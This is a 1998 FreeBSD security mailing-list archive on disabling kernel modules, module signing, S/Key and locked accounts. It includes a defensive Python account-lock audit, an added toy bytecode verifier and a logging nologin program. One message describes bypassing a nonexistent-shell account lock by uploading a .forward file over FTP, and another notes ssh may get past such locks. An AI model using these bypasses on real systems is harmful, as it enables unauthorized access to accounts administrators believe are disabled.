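        yield fields[0], fields[1], fields[9]


def parse_skeykeys(text):
    """Set of login names enrolled in S/Key (assumed first-token layout)."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def classify(name, password, shell, installed_shells, skey_users):
    """Decide which control, if any, blocks a session for one account."""
    skey = name in skey_users
    if shell in NOLOGIN_SHELLS:
        # Session refused whatever authentication succeeded.
        return Account(name, password, shell, skey, "shell-locked", False)
    if shell not in installed_shells:
        # exec of the shell fails; the thread notes ssh may still get past this.
        return Account(name, password, shell, skey, "shell-missing", False)
    if password == "":
        # passwd(5): an empty field means no password is required at all.
        return Account(name, password, shell, skey, "no-password", True)
    if password == "*":
        # Password auth cannot succeed, but S/Key or keys still reach the shell.
        return Account(name, password, shell, skey, "password-locked", True)
    return Account(name, password, shell, skey, "open", True)


def audit(master_passwd, skeykeys, installed_shells=INSTALLED_SHELLS):
    """Return {name: Account} for every entry in master_passwd."""
    skey_users = parse_skeykeys(skeykeys)
    return {name: classify(name, pw, sh, installed_shells, skey_users)
            for name, pw, sh in parse_master_passwd(master_passwd)}


def findings(accounts):
    """Accounts an administrator probably believes are locked but are not."""
    out = []
    for acct in accounts.values():
        if acct.state == "no-password":
            out.append((acct.name, "empty password field: no password required"))
        elif acct.state == "password-locked" and acct.skey:
            out.append((acct.name, "'*' password but S/Key enrolled and shell "
                                   "usable: S/Key login still works"))
    return out


# Constructed sample data (not from any real system).
MASTER_PASSWD = """\
# name:password:uid:gid:class:change:expire:gecos:home:shell
root:$1$zzzzzzzz$zzzzzzzzzzzzzzzzzzzzzz:0:0::0:0:Charlie &:/root:/bin/csh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
alice:*:1001:1001::0:0:Alice:/home/alice:/bin/sh
bob:*:1002:1002::0:0:Bob:/home/bob:/sbin/nologin
carol::1003:1003::0:0:Carol:/home/carol:/bin/sh
dave:$1$yyyyyyyy$yyyyyyyyyyyyyyyyyyyyyy:1004:1004::0:0:Dave:/home/dave:/bin/sh
erin:*:1005:1005::0:0:Erin:/home/erin:/nonexistent
"""
SKEYKEYS = ("alice 0097 al12345 0123456789abcdef May 21,1998 12:00:00\n"
            "dave 0050 da54321 fedcba9876543210 May 21,1998 12:00:00\n")

if __name__ == "__main__":
    accts = audit(MASTER_PASSWD, SKEYKEYS)
    for a in accts.values():
        print("%-8s %-16s skey=%-5s shell=%s" % (a.name, a.state, a.skey, a.shell))
    for name, why in findings(accts):
        print("FINDING %s: %s" % (name, why))
```

On a real host you would read /etc/master.passwd and the S/Key database and replace INSTALLED_SHELLS with an os.path.exists() check; "shell-missing" is kept separate from "shell-locked" because the thread only vouches for /sbin/nologin as stopping ssh.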
From: Philippe Regnauld
To: Nicholas Charles Brawn
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
References: <199805211431.KAA17444@brain.zeus.leitch.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.88e
In-Reply-To: ; from Nicholas Charles Brawn on Fri, May 22, 1998 at 10:02:46AM +1000
X-Operating-System: FreeBSD 2.2.5-STABLE i386
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Nicholas Charles Brawn writes:
> > 
> > I'd love to have a "virus" scanner that could detect the signature of a
> > LKM module or the LKM loader in a kernel.  Of course by "signature" here
> > I mean something that would recognize the style of code necessary to
> > perform this operation, not the specific sequence of bits in any given
> > implementation.
> 
> You may have a point here. Is there any way you could "sign" a module to
> ensure its authenticity? And on top of that build in an automatic
> authentication system within the kernel that rejects lkm's that are not
> signed? Perhaps this could be included so as to be performed at one of the
> securelevels?

    Hey, great idea, let's call it Active-LKM. :-)

-- 
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
«Pluto placed his bad dog at the entrance of Hades to keep the dead
IN and the living OUT! The archetypical corporate firewall?»
                                                   - S. Kelly Bootle

From owner-freebsd-security Fri May 22 02:02:16 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA11026 for freebsd-security-outgoing; Fri, 22 May 1998 02:02:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from arc.netlab.sk (arc.netlab.sk [195.168.1.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA10930 for ; Fri, 22 May 1998 02:02:05 -0700 (PDT) (envelope-from palo.adamec@tecton.sk)
Received: from PCNTWS1 (ba78.netlab.sk [195.168.14.78]) by arc.netlab.sk (8.8.8/8.8.7) with SMTP id LAA25088 for ; Fri, 22 May 1998 11:02:01 +0200 (CEST) (envelope-from palo.adamec@tecton.sk)
Received: by PCNTWS1 with Microsoft Mail id <01BD8571.D24221F0@PCNTWS1>; Fri, 22 May 1998 11:07:34 +0200
Message-ID: <01BD8571.D24221F0@PCNTWS1>
From: Pavol Adamec
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: Virus on FreeBSD
Date: Fri, 22 May 1998 11:07:33 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id CAA10973
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Nicholas Charles Brawn wrote:
>You may have a point here. Is there any way you could "sign" a module to
>ensure its authenticity? And on top of that build in an automatic
>authentication system within the kernel that rejects lkm's that are not
>signed? Perhaps this could be included so as to be performed at one of the
>securelevels?

There's something a little close to what you mean. There are some research
OS projects dealing with extensible (micro/nano)kernels. Many of them use
some kind of LKM's, varying from SPIN with an in-kernel MODULA compiler to
systems based on run-time proving of the correctness of the code being
loaded. I'm very sorry that I don't remember the name, but there is one
that does in-kernel run-time checking of the object code based on the
formal description of the instructions. I've read it in an ACM SIGOPS OSR
issue somewhere in 1997 or 1996. I don't have them at hand at present, so
that's why my answer is so uncertain. Maybe there's someone who could look
for it.

For those who don't know OSR, have a look at http://www.acm.org/sigops/

-------------------------------------------------------------------
Pavol Adamec
AZC, a.s.
Kukucinova 22, Bratislava, Slovakia
tel: ++421 7 5252688
fax: ++421 7 5252679
email: palo.adamec@tecton.sk
-------------------------------------------------------------------

From owner-freebsd-security Fri May 22 03:07:05 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA21516 for freebsd-security-outgoing; Fri, 22 May 1998 03:07:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from portal.eltex.spb.ru ([195.19.195.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA21488 for ; Fri, 22 May 1998 03:06:51 -0700 (PDT) (envelope-from ark@eltex.spb.ru)
From: ark@eltex.spb.ru Received: from paranoid.eltex.spb.ru (border1.eltex.spb.ru [194.58.218.11] (may be forged)) by portal.eltex.spb.ru (8.8.8/8.8.8) with ESMTP id OAA02725; Fri, 22 May 1998 14:01:12 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id OAA16417; Fri, 22 May 1998 14:02:08 GMT Date: Fri, 22 May 1998 14:02:08 GMT Message-Id: <199805221402.OAA16417@paranoid.eltex.spb.ru> In-Reply-To: <199805211901.PAA23176@brain.zeus.leitch.com> from "woods@zeus.leitch.com (Greg A. Woods)" Organization: "Klingon Imperial Intelligence Service" Subject: Re: Virus on FreeBSD To: freebsd-security@FreeBSD.ORG Cc: regnauld@deepo.prosa.dk Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- nuqneH, woods@zeus.leitch.com (Greg A. Woods) said : > [ On Thu, May 21, 1998 at 18:15:55 (+0200), Philippe Regnauld wrote: ] > > Subject: Re: Virus on FreeBSD > > > > Greg A. Woods writes: > > > > > Anyone who's read that article and has even the tiniest amount of > > > imagination would *NEVER* run LKMs on a production machine. Sure > > > > BTW, is there a mechanism to disable loading of LKMs ? > > (of course, removing the modload command is one way) -- I was > > thinking about something that looked at the securelevel > > and refused to load/unload a module depending on it. > > Not difficult at all, thankfully. Just define NO_LKM in your kernel > configuration (from the /sys/i386/conf/LINT kernel config example): > > # If you want to disable loadable kernel modules (LKM), you > # might want to use this option. > options NO_LKM > > I've not done a code walkthrough to ensure this is 100%, but it's a good > start and at least prevents modload from being useful. 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does something for that system. 
_ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNWWFX6H/mIJW9LeBAQHp/AQAicOQcxk6CZAO3VSxnLHKAIYSsyRgj+2i /1U6AEmn1wI+VdbEk9o/1xxMAMFsV89UWwf3qhZi+qbSWdUvY7kxY7WNJe/mEi3Y uQqfkEwbSQgTTUZc1SUbxdqV+Za/7MS8Y4oxct3640oCBbsSuAjcQG44p7ZxpBqE aYfqvFlu5gg= =mPGa -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 05:36:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA12086 for freebsd-security-outgoing; Fri, 22 May 1998 05:36:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (root@COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA12054 for ; Fri, 22 May 1998 05:36:07 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id IAA11238; Fri, 22 May 1998 08:35:59 -0400 (EDT) Date: Fri, 22 May 1998 08:35:59 -0400 (EDT) 
From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Pavol Adamec cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Virus on FreeBSD In-Reply-To: <01BD8571.D24221F0@PCNTWS1> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998, Pavol Adamec wrote: > There's something little close to what you mean. There are some research > OS projects dealing with extensible (micro/nano)kernels. Many of them > use some kind of LKM's, varying from SPIN with in-kernel MODULA compiler > to systems based on run-time proving of the correctness of the code > being loaded. I'm very sorry, that I don't remember the the name, but > there is one, that does in-kernel run-time checking of the object code > based on the formal description of the instructions. I've read it in an > ACM's SIGOPS OSR issue somewhere in 1997 or 1996. I don't have them by > the hand at the present, so that's way my answer is so uncertain. Maybe > there's someone who could look for it. There is work going on at the Fox project at CMU (sorry, URL not available just this moment due to DNS problems) with a proof-generating compiler that guarantees memory/type safety -- I believe that the first intended use was providing a replacement for BPF. The compiler generates machine code + a proof of its safety. The kernel then does a linear-order verification of the proof, and can safely use the machine code. Leaving aside issues of Turing computability and undecidability, this is extremely useful :). I know that they are working on bigger and better things there, and that operating systems with built in proof verification might see dramatic performance increases, as the kernel could effectively host a thread for them that "promises" (by way of a verifiable proof) that it will behave correctly (i.e., not touch other people's memory, etc). 
I believe they do this by a combination of proven pre/post-conditions, and where a proof is not available, run-time checks that are proven to be safe. I believe one could see a dramatic performance improvement in a number of places if memory safety was guaranteed -- even just as simple as guaranteeing that syscall arguments were correct and did not need to be verified against memory allocation, etc. There are limits to what the proof system can currently do, but it looks remarkably promising (I had given up on proofs for a while there.. :). With regards to other signatures -- I suppose we could have a digital signature on an lkm -- but this isn't all that useful. Suppose a bug is discovered in an lkm in version 2.2.9. In 2.2.9.1, a fix is released. Both are signed by the FreeBSD Project Magic Key. However, unless you do some weird things with versions, the kernel will accept both of the lkms, including the buggy one. To protect the kernel properly, lkms need to be disabled at a sufficiently high run-level (possibly always), and appropriate file system stuff protected. Personally, I like the idea of using a CD-ROM for a file system, but it's not so very fast. 
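The kernel-side check Robert describes above (accept foreign code only after a linear pass establishes that it cannot touch memory it should not) can be seen in miniature without a proof-generating compiler. What follows is an added example by the editor, not code from this thread, from the Fox project or from FreeBSD: a toy packet-filter bytecode with a verifier that rejects out-of-bounds loads, bad registers and any path that can run off the end, and an interpreter that is only ever handed programs the verifier accepted. The instruction set, the verdict codes and the sample programs are all the editor's constructions.

```c
/*
 * Editor's example: "verify before you run" for a toy packet-filter
 * bytecode.  Proof-carrying code ships a proof with the machine code and
 * the kernel checks the proof; the cheaper cousin shown here (the route
 * classic BPF takes) restricts the language so that one linear pass over
 * the program settles memory safety and termination.  Nothing reaches
 * filter_run() unless verify() accepted it, so the interpreter itself
 * carries no per-instruction bounds checks.
 */
#include <stddef.h>
#include <stdint.h>

#define NREGS 4

enum op {
    OP_LD,   /* r[reg] = pkt[k]                 */
    OP_ADD,  /* r[reg] += k                     */
    OP_JGT,  /* if (r[reg] > k) skip next insn  */
    OP_RET,  /* return r[reg]                   */
    OP_MAX
};

struct insn { uint8_t op; uint8_t reg; uint16_t k; };

enum verdict {
    V_OK        =  0,
    V_EMPTY     = -1,  /* nothing to run                              */
    V_BAD_OP    = -2,  /* unknown opcode                              */
    V_BAD_REG   = -3,  /* register index out of range                 */
    V_OOB_LOAD  = -4,  /* packet offset not provably inside the bound */
    V_FALLS_OFF = -5   /* some path can leave the program without RET */
};

/*
 * One linear pass.  The only branch is a forward skip of one instruction,
 * so every program terminates; what is left to prove is that no load can
 * reach beyond min_pktlen and that no path runs past the last instruction.
 */
int verify(const struct insn *prog, size_t n, size_t min_pktlen)
{
    size_t i;

    if (n == 0)
        return V_EMPTY;
    for (i = 0; i < n; i++) {
        if (prog[i].op >= OP_MAX)
            return V_BAD_OP;
        if (prog[i].reg >= NREGS)
            return V_BAD_REG;
        if (prog[i].op == OP_LD && prog[i].k >= min_pktlen)
            return V_OOB_LOAD;
        if (prog[i].op == OP_JGT && i + 2 >= n)   /* taken skip leaves prog */
            return V_FALLS_OFF;
    }
    return prog[n - 1].op == OP_RET ? V_OK : V_FALLS_OFF;
}

/* A filter is runnable only once it carries a verified flag and its bound. */
struct filter {
    const struct insn *prog;
    size_t n, min_pktlen;
    int verified;
};

int filter_load(struct filter *f, const struct insn *prog, size_t n,
                size_t min_pktlen)
{
    int v = verify(prog, n, min_pktlen);

    f->prog = prog;
    f->n = n;
    f->min_pktlen = min_pktlen;
    f->verified = (v == V_OK);
    return v;
}

/*
 * Interpreter.  The one check that cannot be done statically is the real
 * packet length; everything else was settled by verify().  Returns 0 with
 * the filter's value in *out, or -1 if the filter is refused.
 */
int filter_run(const struct filter *f, const uint8_t *pkt, size_t pktlen,
               uint32_t *out)
{
    uint32_t r[NREGS] = {0, 0, 0, 0};
    size_t pc = 0;

    if (!f->verified || pktlen < f->min_pktlen)
        return -1;
    while (pc < f->n) {
        const struct insn *in = &f->prog[pc++];

        switch (in->op) {
        case OP_LD:  r[in->reg] = pkt[in->k];        break;
        case OP_ADD: r[in->reg] += in->k;            break;
        case OP_JGT: if (r[in->reg] > in->k) pc++;   break;
        case OP_RET: *out = r[in->reg];              return 0;
        }
    }
    return -1;  /* unreachable for a verified program */
}

/* Constructed programs: one acceptable filter, four the verifier rejects. */
static const struct insn good_prog[] = {
    {OP_LD, 0, 12},    /* r0 = pkt[12]                     */
    {OP_JGT, 0, 0x7F}, /* if r0 > 127 skip the drop below  */
    {OP_RET, 1, 0},    /* drop: r1 is still 0              */
    {OP_ADD, 0, 1},
    {OP_RET, 0, 0}     /* accept with pkt[12] + 1          */
};
#define GOOD_N (sizeof good_prog / sizeof good_prog[0])
static const struct insn bad_oob[]  = { {OP_LD, 0, 20}, {OP_RET, 0, 0} };
static const struct insn bad_skip[] = { {OP_LD, 0, 0}, {OP_JGT, 0, 1}, {OP_RET, 0, 0} };
static const struct insn bad_tail[] = { {OP_LD, 0, 0}, {OP_ADD, 0, 1} };
static const struct insn bad_reg[]  = { {OP_LD, 7, 0}, {OP_RET, 0, 0} };

/* Run good_prog over a constructed 16-byte packet whose byte 12 is b12,
 * claiming pktlen_offered bytes; 0xFFFFFFFF means the filter was refused. */
uint32_t demo_run(uint8_t b12, size_t pktlen_offered)
{
    uint8_t pkt[16] = {0};
    struct filter f;
    uint32_t out = 0;

    if (pktlen_offered > sizeof pkt)
        pktlen_offered = sizeof pkt;
    pkt[12] = b12;
    if (filter_load(&f, good_prog, GOOD_N, sizeof pkt) != V_OK)
        return 0xFFFFFFFFu;
    if (filter_run(&f, pkt, pktlen_offered, &out) != 0)
        return 0xFFFFFFFFu;
    return out;
}
```

Because the only branch is a forward skip, termination comes for free; a real BPF verifier has to reason the same way over arbitrary forward jumps, and proof-carrying code moves that reasoning to the producer so the kernel is left with only a proof to check.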
Robert N Watson ---- Carnegie Mellon University http://www.cmu.edu/ Trusted Information Systems http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 06:25:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA18305 for freebsd-security-outgoing; Fri, 22 May 1998 06:25:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from softweyr.com ([204.68.178.33]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA18296 for ; Fri, 22 May 1998 06:25:24 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (localhost.softweyr.com [127.0.0.1]) by softweyr.com (8.8.8/8.8.7) with ESMTP id HAA02079; Fri, 22 May 1998 07:24:56 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <35657CA6.D93AC10D@softweyr.com> Date: Fri, 22 May 1998 07:24:54 -0600 
From: Wes Peters Organization: Softweyr llc X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 2.2.6-RELEASE i386) MIME-Version: 1.0 To: Philippe Regnauld CC: Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account References: <19980521183148.07894@deepo.prosa.dk> <199805212338.QAA05467@antipodes.cdrom.com> <19980522101215.41390@deepo.prosa.dk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Philippe Regnauld wrote: > Ok -- just referrring to the man page: > > The password field is the encrypted form of the password. If the > password field is empty, no password will be required to gain access to > the machine. This is almost invariably a mistake. Because these files > contain the encrypted user passwords, they should not be readable by any- > one without appropriate privileges. Administrative accounts have a pass- > word field containing an asterisk `*' which disallows normal logins. > > ... it doesn't mention the fact that they _also_ have an invalid > shell. Yeah, this little bit of UNIX arcana has been batted back and forth for years. At least FreeBSD *has* a nologin program, see nologin(8). I don't like it, because it doesn't log the failed access. Here's my replacement, which does: ~~~~~~~~~ nologin.c ~~~~~~~~~ /* * nologin.c - a login shell for disabling users. * * Copyright (c) 1997 Softweyr LLC, South Jordan, Utah USA. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * 3. 
All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *
 *      This product includes software developed by Softweyr LLC
 *
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * This software is provided by Softweyr LLC ``as is'' and any express or
 * implied warranties, including, but not limited to, the implied warranties
 * of merchantability and fitness for a particular purpose are disclaimed.
 * In no event shall Softweyr LLC or any contributors be liable for any
 * direct, indirect, incidental, special, exemplary, or consequential
 * damages (including, but not limited to, procurement of substitute goods
 * or services; loss of use, data, or profits; or business interruption)
 * however caused and on any theory of liability, whether in contract,
 * strict liability, or tort (including negligence or otherwise) arising in
 * any way out of the use of this software, even if advised of the
 * possibility of such damage.
 *
 * Author: Wes Peters
 * Date: Tue Jan 28 21:30:06 MST 1997
 */

#include <stdio.h>
#include <syslog.h>
#include <unistd.h>

int
main(int argc, char *argv[])
{
	const char *user, *device;

	/* Who is trying to log in, and on which tty; either may be unknown. */
	if ((user = getlogin()) == NULL)
		user = "UNKNOWN";
	if ((device = ttyname(0)) == NULL)
		device = "UNKNOWN";

	/* Record the attempt under the auth facility, falling back to the console. */
	openlog("nologin", LOG_CONS, LOG_AUTH);
	syslog(LOG_CRIT, "%s on %s", user, device);
	closelog();

	/* Deliberately prints nothing to the user; the session simply ends. */
	return 0;
}
~~~~~~~~~~ nologin.8 ~~~~~~~~~~
.\" nologin.c - a login shell for disabling users.
.\"
.\" Copyright (c) 1997 Softweyr LLC, South Jordan, Utah USA.
.\" All rights reserved.
.\"
.\" Redistribution and use in source and binary forms, with or without
.\" modification, are permitted provided that the following conditions
.\" are met:
.\"
.\" 1. Redistributions of source code must retain the above copyright
.\"    notice, this list of conditions and the following disclaimer.
.\"
.\" 2. Redistributions in binary form must reproduce the above copyright
.\"    notice, this list of conditions and the following disclaimer in the
.\"    documentation and/or other materials provided with the distribution.
.\"
.\" 3. All advertising materials mentioning features or use of this software
.\"    must display the following acknowledgement:
.\"
.\"      This product includes software developed by Softweyr LLC
.\"
.\" 4. Neither the name of the University nor the names of its contributors
.\"    may be used to endorse or promote products derived from this software
.\"    without specific prior written permission.
.\"
.\" This software is provided by Softweyr LLC ``as is'' and any express or
.\" implied warranties, including, but not limited to, the implied warranties
.\" of merchantability and fitness for a particular purpose are disclaimed.
.\" In no event shall Softweyr LLC or any contributors be liable for any
.\" direct, indirect, incidental, special, exemplary, or consequential
.\" damages (including, but not limited to, procurement of substitute goods
.\" or services; loss of use, data, or profits; or business interruption)
.\" however caused and on any theory of liability, whether in contract,
.\" strict liability, or tort (including negligence or otherwise) arising in
.\" any way out of the use of this software, even if advised of the
.\" possibility of such damage.
.\"
.\" Author: Wes Peters
.\" Date: Tue Jan 28 21:30:06 MST 1997
.TH nologin 1 "1 Jan 1997"
.SH NAME
nologin \- a login shell for disabled users
.SH SYNOPSIS
.B nologin
.SH DESCRIPTION
.B nologin
is a login shell for user accounts that have been disabled.
It logs the attempted login via the
.BR syslog (3)
mechanism, with an
.I ident
of
.B nologin
and a
.I facility
of
.BR LOG_AUTH .
Log entries will appear in the system log as:
.LP
.RS
Jan 28 21:36:54
.I hostname
nologin:
.I user
on
.I /dev/ttypX
.RE
.LP
Please note that you should
.B not
add the
.B nologin
program to the
.B /etc/shells
file, as you do not want users to accidentally set their shell to
.B nologin.
.SH AUTHOR
Wes Peters, Softweyr LLC: wes@softweyr.com
~~~~~~~~~~ end snip ~~~~~~~~~~
-- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 07:07:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA26197 for freebsd-security-outgoing; Fri, 22 May 1998 07:07:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA26163 for ; Fri, 22 May 1998 07:07:33 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id SAA20028; Fri, 22 May 1998 18:08:00 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id QAA22445; Fri, 22 May 1998 16:32:10 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id QAA22121; Fri, 22 May 1998 16:06:19 +0200 (CEST) Message-ID: <19980522160618.52012@deepo.prosa.dk> Date: Fri, 22 May 1998 16:06:19 +0200 
From: Philippe Regnauld To: Robert Watson Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Virus on FreeBSD References: <01BD8571.D24221F0@PCNTWS1> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: ; from Robert Watson on Fri, May 22, 1998 at 08:35:59AM -0400 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Robert Watson writes: > To protect the kernel properly, lkms need to be disabled at a sufficiently > high run-level (possibly always), and appropriate file system stuff > protected. Personally, I like the idea of using a CD-ROM for a file > system, but it's not so very fast. 32x will deliver pretty good performance -- not unlike a washing machine on spin-cycle, but ok. I'm more concerned about how long such a device would live with filesystem-like activity -- the way CD drives are built today, I wouldn't expect very long. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 08:27:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA08011 for freebsd-security-outgoing; Fri, 22 May 1998 08:27:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA07984 for ; Fri, 22 May 1998 08:27:32 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.8.7/8.8.7) with SMTP id LAA25215; Fri, 22 May 1998 11:27:09 -0400 (EDT) Date: Fri, 22 May 1998 11:27:09 -0400 (EDT) 
From: Snob Art Genre Reply-To: ben@rosengart.com To: Mike Smith cc: Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: <199805212338.QAA05467@antipodes.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 21 May 1998, Mike Smith wrote: > If you wish to disable a user's account, you should set their shell to > something nonexistent. (Note that ssh may still be a way past this.) How? I don't like this: isn't it standard practice across unixes to set a nonexistent shell to disable logins? POLA etc. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 09:36:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA19707 for freebsd-security-outgoing; Fri, 22 May 1998 09:36:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA19621 for ; Fri, 22 May 1998 09:36:08 -0700 (PDT) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id MAA02617; Fri, 22 May 1998 12:35:16 -0400 (EDT) Date: Fri, 22 May 1998 12:35:15 -0400 (EDT) 
From: "Matthew N. Dodd" To: ben@rosengart.com cc: Mike Smith , Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998, Snob Art Genre wrote: > How? I don't like this: isn't it standard practice across unixes to set > a nonexistent shell to disable logins? POLA etc. I remember getting around this by ftp'ing a .forward file containing nice things to reset my shell. Of course, this assumes that ftp is setup as to allow logins for users with 'invalid' shells. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 12:47:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA02268 for freebsd-security-outgoing; Fri, 22 May 1998 12:47:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (sreid@sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA02184 for ; Fri, 22 May 1998 12:47:35 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.8.7/8.8.7) id MAA21169; Fri, 22 May 1998 12:51:43 -0700 Date: Fri, 22 May 1998 12:51:43 -0700 (PDT) 
